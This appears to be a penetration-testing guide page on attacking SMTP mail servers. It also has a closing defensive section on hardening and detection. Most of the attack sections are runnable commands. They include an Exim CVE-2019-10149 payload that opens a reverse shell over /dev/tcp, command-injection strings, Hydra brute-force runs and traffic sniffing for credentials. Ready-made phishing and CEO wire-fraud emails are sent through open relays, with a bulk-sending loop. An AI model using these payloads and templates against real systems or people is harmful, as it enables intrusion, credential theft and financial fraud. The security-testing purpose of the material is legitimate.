SMTP Service Attacks and Exploitation
SMTP exploitation guide covering user enumeration, open relay testing, email spoofing, brute-force authentication, and NTLM information disclosure.
SMTPNetwork ServicesPort 25Service EnumerationEmail SecurityUser EnumerationOpen RelayEmail SpoofingPenetration TestingMail Server
Introduction
The Simple Mail Transfer Protocol (SMTP) is the standard protocol for sending email messages between mail servers across the Internet. Operating primarily on TCP ports 25, 465 (SMTP over SSL), and 587 (submission), SMTP has been fundamental to email communication since 1982.
Despite decades of refinement, SMTP implementations remain vulnerable to various security issues:
- User enumeration: Discovery of valid email addresses and usernames
- Open relay misconfiguration: Abuse for spam distribution
- Authentication weaknesses: Plain-text credentials, weak passwords
- Email spoofing: Forged sender addresses and phishing
- Command injection: Exploitation of poorly validated input
- Information disclosure: Banner and error message leakage
Why SMTP Remains a Security Concern
SMTP's security challenges stem from both design limitations and implementation issues:
- Legacy protocol: Designed before modern security considerations
- Plain-text by default: Credentials transmitted without encryption
- Trust-based architecture: Originally assumed trusted network
- Complex implementations: Multiple RFCs with inconsistent adherence
- Universal deployment: Every organization runs mail servers
- Social engineering vector: Email-based attacks target human vulnerabilities
- Spam and phishing: SMTP abuse for malicious campaigns
Successful SMTP exploitation can lead to:
- User account compromise: Password discovery or brute-force
- Internal network mapping: Valid username enumeration
- Phishing infrastructure: Open relay abuse
- Email interception: Man-in-the-middle attacks on unencrypted connections
- Privilege escalation: Vulnerable email clients or server components
Technical Background
SMTP Protocol Overview
SMTP operates on a simple command-response model:
Connection Flow:
- Client establishes TCP connection to server port 25/587/465
- Server sends greeting banner (220 code)
- Client sends HELO/EHLO command
- Server responds with capabilities
- Client authenticates (if required)
- Client sends mail transaction (MAIL FROM, RCPT TO, DATA)
- Server accepts or rejects message
- Connection closes with QUIT command
SMTP Ports and Their Purposes
| Port | Purpose | Encryption | Common Use |
|---|---|---|---|
| 25 | SMTP | Plain-text (optional STARTTLS) | Server-to-server communication |
| 465 | SMTPS | Implicit SSL/TLS | Legacy secure submission (deprecated) |
| 587 | Submission | STARTTLS required | Client-to-server mail submission |
| 2525 | Alternative | STARTTLS available | Alternative submission port |
Essential SMTP Commands
| Command | Purpose | Example |
|---|---|---|
HELO | Identify client (simple) | HELO mail.example.com |
EHLO | Identify client (extended) | EHLO mail.example.com |
MAIL FROM | Specify sender | MAIL FROM:<[email protected]> |
RCPT TO | Specify recipient | RCPT TO:<[email protected]> |
DATA | Begin message content | DATA |
VRFY | Verify email address | VRFY admin |
EXPN | Expand mailing list | EXPN staff |
RSET | Reset transaction | RSET |
QUIT | Close connection | QUIT |
STARTTLS | Upgrade to TLS | STARTTLS |
AUTH | Authenticate client | AUTH LOGIN |
SMTP Response Codes
| Code | Meaning | Explanation |
|---|---|---|
| 220 | Service ready | Server greeting |
| 221 | Service closing | Goodbye message |
| 250 | Requested action completed | Success |
| 354 | Start mail input | Ready for DATA |
| 421 | Service not available | Server closing connection |
| 450 | Mailbox unavailable | Temporary failure |
| 550 | Mailbox unavailable | Permanent failure |
| 551 | User not local | Relaying denied |
| 552 | Exceeded storage | Mailbox full |
| 553 | Mailbox name invalid | Bad recipient |
Enumeration
Banner Grabbing and Service Detection
Basic Banner Grab
# Using Netcat
nc 10.10.11.45 25
# Using Telnet
telnet 10.10.11.45 25
# Using Nmap
nmap -p 25,465,587 -sV 10.10.11.45
# Grab and disconnect
echo "QUIT" | nc 10.10.11.45 25Example Banners:
220 mail.example.com ESMTP Postfix
220 mail.example.com Microsoft ESMTP MAIL Service ready
220 mail.example.com ESMTP Sendmail 8.15.2
220 mail.example.com ESMTP Exim 4.94Extended SMTP Enumeration
# Enumerate SMTP capabilities
nc 10.10.11.45 25
EHLO test.com
QUIT
# Automated with Nmap
nmap -p 25 --script smtp-commands 10.10.11.45
nmap -p 25,465,587 --script smtp-enum-users 10.10.11.45EHLO Response Example:
250-mail.example.com Hello test.com
250-SIZE 52428800
250-PIPELINING
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELPNmap SMTP Script Scan
# Comprehensive SMTP scan
nmap -p 25,465,587 -sV --script=smtp-* 10.10.11.45
# Specific useful scripts
nmap -p 25 --script smtp-commands 10.10.11.45
nmap -p 25 --script smtp-open-relay 10.10.11.45
nmap -p 25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} 10.10.11.45
nmap -p 25 --script smtp-ntlm-info 10.10.11.45Useful NSE Scripts:
smtp-commands: List available SMTP commandssmtp-enum-users: Enumerate users via VRFY, EXPN, RCPTsmtp-open-relay: Test for open relaysmtp-ntlm-info: Extract Windows domain informationsmtp-brute: Brute-force SMTP AUTHsmtp-vuln-*: Check for known vulnerabilities
User Enumeration Techniques
VRFY Command
The VRFY command verifies if a mailbox exists:
# Manual enumeration
nc 10.10.11.45 25
VRFY root
VRFY admin
VRFY nonexistent
# Example responses
250 2.1.5 [email protected]
550 5.1.1 User unknownEXPN Command
The EXPN command expands mailing lists:
nc 10.10.11.45 25
EXPN staff
EXPN administrators
# Example response
250 2.1.5 <[email protected]m>
250 2.1.5 <[email protected]m>
250 2.1.5 <[email protected]m>RCPT TO Command
Test recipient validity:
nc 10.10.11.45 25
HELO test.com
MAIL FROM:<[email protected]m>
RCPT TO:<[email protected]m>
# Valid user: 250 2.1.5 OK
# Invalid user: 550 5.1.1 User unknownAutomated User Enumeration
# Using smtp-user-enum
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.10.11.45
# Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > run
# Using Nmap
nmap -p 25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT},smtp-enum-users.domain=example.com 10.10.11.45NTLM Information Disclosure
Extract Windows domain information from SMTP servers supporting NTLM authentication:
# Using Nmap
nmap -p 25,465,587 --script smtp-ntlm-info 10.10.11.45
# Manual extraction
nc 10.10.11.45 25
EHLO test
AUTH NTLM
334
TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
# Server responds with NTLM challenge containing domain infoInformation Leaked:
- NetBIOS domain name
- NetBIOS computer name
- DNS domain name
- DNS computer name
- DNS tree name
- Timestamp
Exploitation Techniques
Open Relay Testing
An open relay allows anyone to send email through the server, useful for spam and phishing.
Manual Open Relay Test
nc 10.10.11.45 25
HELO test.com
MAIL FROM:<[email protected]m>
RCPT TO:<[email protected]m>
DATA
Subject: Test Email
From: [email protected]
To: [email protected]
This is a test email.
.
QUITOpen Relay Indicators:
250 OKresponse to external RCPT TO- Email successfully relayed to external domain
Automated Open Relay Testing
# Using Nmap
nmap -p 25 --script smtp-open-relay 10.10.11.45
# Using swaks
swaks --to [email protected] --from [email protected] --server 10.10.11.45
# Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/smtp/smtp_relay
msf6 auxiliary(scanner/smtp/smtp_relay) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/smtp/smtp_relay) > runAbuse Open Relay
# Send phishing email
swaks --to [email protected] \
--from [email protected] \
--server 10.10.11.45 \
--header "Subject: Urgent: Update Your Credentials" \
--body "Click here: http://evil.com/phish"
# Bulk email campaign
for email in $(cat targets.txt); do
swaks --to $email --from [email protected] --server 10.10.11.45 --body "Phishing message"
sleep 5
doneLegal Warning
Sending unsolicited email or phishing messages through open relays is illegal. This information is provided for authorized penetration testing and defensive security assessment only.
Email Spoofing
SMTP's lack of sender verification allows email spoofing:
# Basic spoofing with Netcat
nc 10.10.11.45 25
HELO mail.example.com
MAIL FROM:<[email protected]m>
RCPT TO:<[email protected]m>
DATA
From: CEO <[email protected]m>
To: Employee <[email protected]m>
Subject: Urgent Payment Request
Date: Thu, 30 Oct 2025 10:00:00 -0000
Please wire $50,000 to account...
.
QUIT
# Using swaks
swaks --to [email protected] \
--from [email protected] \
--server 10.10.11.45 \
--header "Subject: Wire Transfer Request" \
--body "Transfer funds immediately..."
# Using sendemail
sendemail -f [email protected] \
-t [email protected] \
-u "Urgent Request" \
-m "Transfer funds..." \
-s 10.10.11.45SPF/DKIM/DMARC Bypass:
- Spoof internal domain if no SPF record
- Use similar-looking domains (typosquatting)
- Exploit subdomain takeovers with valid SPF
- Leverage trusted third-party services
Authentication Brute-Force
When SMTP AUTH is enabled, test weak credentials:
# Using Hydra
hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt smtp://10.10.11.45
# With specific port
hydra -l admin -P passwords.txt -s 587 smtp://10.10.11.45
# Multiple users
hydra -L users.txt -P passwords.txt smtp://10.10.11.45
# Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE users.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > set PASS_FILE passwords.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > runCommand Injection
Test for command injection in poorly sanitized SMTP implementations:
# Test in MAIL FROM
MAIL FROM:<[email protected]`whoami`>
# Test in RCPT TO
RCPT TO:<[email protected]|id>
# Test in message headers
DATA
Subject: Test`id`
From: [email protected]
To: [email protected]
.Known SMTP Vulnerabilities
Sendmail Debug Mode (CVE-1999-0095)
# Using Metasploit
msfconsole
msf6 > use exploit/unix/smtp/sendmail_debug
msf6 exploit(unix/smtp/sendmail_debug) > set RHOST 10.10.11.45
msf6 exploit(unix/smtp/sendmail_debug) > exploitExim SMTP RCE (CVE-2019-10149)
# Manual exploit
nc 10.10.11.45 25
HELO test
MAIL FROM:<${run{\x2fbin\x2fsh\t-c\t\x22bash\x20-i\x20>%26\x20\x2fdev\x2ftcp\x2f10.10.14.5\x2f4444\x200>%261\x22}}@test.com>
RCPT TO:<root@localhost>
DATA
.
QUITMicrosoft Exchange SSRF (CVE-2021-26855 - ProxyLogon)
Part of the ProxyLogon vulnerability chain exploiting Microsoft Exchange:
# Using Metasploit
msf6 > use exploit/windows/http/exchange_proxylogon_rce
msf6 exploit(windows/http/exchange_proxylogon_rce) > set RHOSTS 10.10.11.45
msf6 exploit(windows/http/exchange_proxylogon_rce) > set EMAIL [email protected]
msf6 exploit(windows/http/exchange_proxylogon_rce) > exploitPost-Exploitation
Email Phishing Infrastructure
Use compromised SMTP server for phishing campaigns:
# Create credential harvester
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
./evilginx
# Configure phishing lure
swaks --to [email protected] \
--from [email protected] \
--server 10.10.11.45 \
--header "Subject: Security Update Required" \
--body "Update your credentials: https://phishing-site.com"Internal Network Mapping
Use user enumeration for internal reconnaissance:
# Enumerate all users
for user in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do
echo "VRFY $user" | nc 10.10.11.45 25 | grep "^250"
done
# Discover naming convention
smtp-user-enum -M VRFY -u admin,administrator,root,sysadmin -t 10.10.11.45
# Build user list for password spraying
./validate_users.sh > valid_users.txtEmail Interception
Monitor SMTP traffic for sensitive information:
# Tcpdump on SMTP port
tcpdump -i eth0 -A -s 0 'tcp port 25'
# Wireshark filter
tcp.port == 25 && smtp
# Extract credentials
tcpdump -i eth0 -A -s 0 'tcp port 25 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x41555448)' # AUTH commandDetection and Defense
Monitoring SMTP Activity
Log Analysis:
# Postfix logs
tail -f /var/log/mail.log
grep "authentication failed" /var/log/mail.log
# Sendmail logs
tail -f /var/log/maillog
# Failed authentication attempts
grep "SASL authentication failed" /var/log/mail.log | awk '{print $9}' | sort | uniq -c | sort -n
# Unusual recipient patterns (potential spam)
grep "RCPT TO" /var/log/mail.log | awk '{print $7}' | sort | uniq -c | sort -n
# Monitor for relaying
grep "relay denied" /var/log/mail.logHardening SMTP Configuration
Disable User Enumeration
Postfix (/etc/postfix/main.cf):
disable_vrfy_command = yes
smtpd_banner = $myhostname ESMTPSendmail (/etc/mail/sendmail.mc):
define(`confPRIVACY_FLAGS', `goaway,noexpn,novrfy')dnlExim (/etc/exim4/exim4.conf.template):
smtp_verify = false
smtp_expn_hosts = localhostConfigure Authentication
Postfix SMTP AUTH:
smtpd_sasl_auth_enable = yes
smtpd_sasl_type = dovecot
smtpd_sasl_path = private/auth
smtpd_sasl_security_options = noanonymous
smtpd_sasl_local_domain = $myhostnamePrevent Open Relay
Postfix:
smtpd_recipient_restrictions =
permit_mynetworks,
permit_sasl_authenticated,
reject_unauth_destination
mynetworks = 127.0.0.0/8, 10.10.10.0/24Sendmail:
FEATURE(`access_db')dnlThen configure /etc/mail/access:
localhost.localdomain RELAY
localhost RELAY
10.10.10 RELAYEnable TLS/SSL
Postfix:
smtpd_tls_cert_file = /etc/ssl/certs/mail.crt
smtpd_tls_key_file = /etc/ssl/private/mail.key
smtpd_tls_security_level = may
smtpd_tls_protocols = !SSLv2, !SSLv3, !TLSv1, !TLSv1.1
smtp_tls_mandatory_ciphers = highForce STARTTLS for submission:
submission inet n - y - - smtpd
-o smtpd_tls_security_level=encrypt
-o smtpd_sasl_auth_enable=yesRate Limiting
Postfix:
smtpd_client_connection_rate_limit = 10
smtpd_client_message_rate_limit = 20
smtpd_client_recipient_rate_limit = 50
anvil_rate_time_unit = 60sImplement SPF, DKIM, DMARC
SPF Record (DNS TXT):
v=spf1 mx ip4:10.10.11.45 -allDMARC Record (DNS TXT for _dmarc subdomain):
v=DMARC1; p=reject; rua=mailto:[email protected]; ruf=mailto:[email protected]; fo=1DKIM Configuration:
# Generate DKIM keys
opendkim-genkey -t -s mail -d example.com
# Add to DNS
# mail._domainkey.example.com TXT "v=DKIM1; k=rsa; p=MIGfMA0GCS..."Intrusion Detection
# Configure fail2ban for SMTP
# /etc/fail2ban/jail.local
[postfix-sasl]
enabled = true
port = smtp,465,587
filter = postfix-sasl
logpath = /var/log/mail.log
maxretry = 3
bantime = 3600
# Create filter /etc/fail2ban/filter.d/postfix-sasl.conf
[Definition]
failregex = : warning: [-._\w]+\[<HOST>\]: SASL (?:LOGIN|PLAIN|(?:CRAM|DIGEST)-MD5) authentication failed
# Restart fail2ban
systemctl restart fail2banReferences
Last updated on
RDP Service Attacks and Exploitation
RDP attack and exploitation techniques including password attacks, session hijacking, pass-the-hash, BlueKeep vulnerability, and RDPGateway exploitation.
SQL Database Service Attacks and Exploitation
Database attack guide for MySQL and MSSQL covering authentication attacks, xp_cmdshell exploitation, hash stealing, impersonation, and linked servers.